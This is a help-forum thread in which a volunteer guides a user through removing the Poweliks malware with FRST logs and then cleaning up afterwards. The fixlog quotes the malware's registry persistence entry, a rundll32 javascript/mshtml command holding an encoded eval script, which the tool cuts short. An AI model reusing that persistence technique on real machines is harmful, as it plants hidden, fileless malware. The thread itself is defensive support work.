Jump to content

Recommended Posts

Ok, so. 

 

My computer started slowing down and I checked and saw multiple instances of dllhost.exe bogging down my CPU usage, taking almost 100%. I ran all my anti-malware programs and removed multiple Trojans and Worms. I ran combofix (don't worry, I know what I'm doing) but it didn't seem to solve the issue. I ran FRST and have all the logs. I am attaching them below.

 

Please help ASAP! 

FRST.txt

Addition.txt

Link to post
Share on other sites

How is the computer running???

It should be OK now.....Poweliks has been removed.

MrC

I didn't do anything? All you told me to do was run the fix in FRST.exe and then post the log. I did that but how could that fix my pc? There is still mutiple instances of dllhost.exe.

What should I do now? Perhaps you are confusing my post with the many others with the same issue that I see you are also helping out. Look up and read my log, then tell me what my next step should be. 

 

Thanks!

Link to post
Share on other sites

That's all that's needed to remove it.

Re-scan with FRST and Make sure the Addition Box is checked.

Post or attach the 2 logs FRST(64).txt and Addition.txt

MrC

 

Content of fixlist:

*****************

HKU\S-1-5-21-2225270536-3074668905-2890858297-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters).

CustomCLSID: HKU\S-1-5-21-2225270536-3074668905-2890858297-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters).

*****************

"HKU\S-1-5-21-2225270536-3074668905-2890858297-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.

"HKU\S-1-5-21-2225270536-3074668905-2890858297-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.

"HKU\S-1-5-21-2225270536-3074668905-2890858297-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

==== End of Fixlog ====

Link to post
Share on other sites

The Poweliks infection is gone.

dllhost.exe belongs to the Microsoft Windows Operating System and you will see it running

The FRST log show a couple of empty tasks and one file containing AlternateDataStreams.

Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait

The tool will create a log (Fixlog.txt) in the folder, please post it to your reply.

MrC

Link to post
Share on other sites

The Poweliks infection is gone.

dllhost.exe belongs to the Microsoft Windows Operating System and you will see it running

The FRST log show a couple of empty tasks and one file containing AlternateDataStreams.

Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait

The tool will create a log (Fixlog.txt) in the folder, please post it to your reply.

MrC

Here it is. LMK if I need to do anything else...

 

Thanks!

Fixlog.txt

Link to post
Share on other sites

That's it, if they're no other problems......

Lets check your computers security before you go and we have a little cleanup to do also:

Download Security Check by screen317 from HERE or HERE.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • If you get Unsupported operating system. Aborting now, just reboot and try again.
  • A Notepad document should open automatically called checkup.txt.
  • Please Post the contents of that document.
  • Do Not Attach It!!!
MrC
Link to post
Share on other sites

That's it, if they're no other problems......

Lets check your computers security before you go and we have a little cleanup to do also:

Download Security Check by screen317 from HERE or HERE.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • If you get Unsupported operating system. Aborting now, just reboot and try again.
  • A Notepad document should open automatically called checkup.txt.
  • Please Post the contents of that document.
  • Do Not Attach It!!!
MrC

 

Here is contents of log:

 

Results of screen317's Security Check version 0.99.89  
 Windows 7 Service Pack 1 x86 (UAC is disabled!)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Microsoft Security Essentials   
 Antivirus up to date!  
`````````Anti-malware/Other Utilities Check:````````` 
 SUPERAntiSpyware     
 Java 7 Update 60  
 Java version out of Date! 
 Adobe Reader XI  
 Google Chrome 38.0.2125.101  
 Google Chrome 38.0.2125.104  
````````Process Check: objlist.exe by Laurent````````  
 Microsoft Security Essentials MSMpEng.exe 
 Microsoft Security Essentials msseces.exe 
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbam.exe  
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C: 2% 
````````````````````End of Log`````````````````````` 
 
 
I have to go now so if there is anything else that needs to be done just leave me instructions and I'll do it in the moring, I can also post more logs in the morn if you need.
 
For now, Thank you very much for all the help, was expecting a long, drawn out virus removal process but I guess not. Hopefully it stays out. One more question. Do you have any idea how it originally got on to my computer? I haven't visted any sketchy sites or used pirating software. Anyways, thanks again and enjoy your night! 
Link to post
Share on other sites

I have to go now so if there is anything else that needs to be done just leave me instructions and I'll do it in the moring, I can also post more logs in the morn if you need.

For now, Thank you very much for all the help, was expecting a long, drawn out virus removal process but I guess not. Hopefully it stays out. One more question. Do you have any idea how it originally got on to my computer? I haven't vist

ed any sketchy sites or used pirating software. Anyways, thanks again and enjoy your night!

I can't be sure how you got infected, various methods are used.

You can check the links below or Google Poweliks for more info:

http://www.pcworld.com/article/2461120/stealthy-malware-poweliks-resides-only-in-system-registry.html

http://www.sophos.com/en-us/support/knowledgebase/121370.aspx

===========================

Out dated programs on the system are vulnerable to malware.

Please update or uninstall them:

====================

Java 7 Update 60 <-----------please uninstall from your Programs and Features

Java version out of Date! <-------Download and install the latest version (Java™ 8 Update 25) from Here. Uncheck the box to install the Ask toolbar!!!, McAfee Security Scan Plus or any other free "stuff".

===================

A little clean up to do....

Please Uninstall ComboFix: (------->if you used it<-------)

Press the Windows logo key + R to bring up the "run box"

Copy and paste next command in the field:

ComboFix /uninstall

Make sure there's a space between Combofix and /

cf2.jpg

Then hit enter. (it may look like CF is re-installing but it's not)

This will uninstall Combofix, delete its related folders and files, hide file extensions, hide the system/hidden files and clears System Restore cache and create new Restore point

(If that doesn't work.....you can simply rename ComboFix.exe to Uninstall.exe and double click it to complete the uninstall or download and run the uninstaller)

---------------------------------

bwebb7v.jpgDownload Delfix from here and save it to your desktop. (you may already have this)

  • Ensure Remove disinfection tools is checked.
  • Click the Run button.
  • Reboot

Any other programs or logs that are still remaining, you can manually delete. (right click.....Delete)

IE: RogueKiller.exe, RKreport.txt, RK_Quarantine folder, C:\FRST folder, FRST-OlderVersion folder, MBAR folder, etc....AdwCleaner > just run the program and click uninstall.

Note:

If you used FRST and can't delete the quarantine folder:

Download the fixlist.txt to the same folder as FRST.exe.

Run FRST.exe and click Fix only once and wait

That will delete the quarantine folder created by FRST.

The rest you can manually delete.

-------------------------------

Any questions...please post back.

If you think I've helped you, please leave a comment > click on my avatar picture > click Profile Feed.

Take a look at My Preventive Maintenance to avoid being infected again.

Good Luck and Thanks for using the forum, MrC

Link to post
Share on other sites

  • Root Admin

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.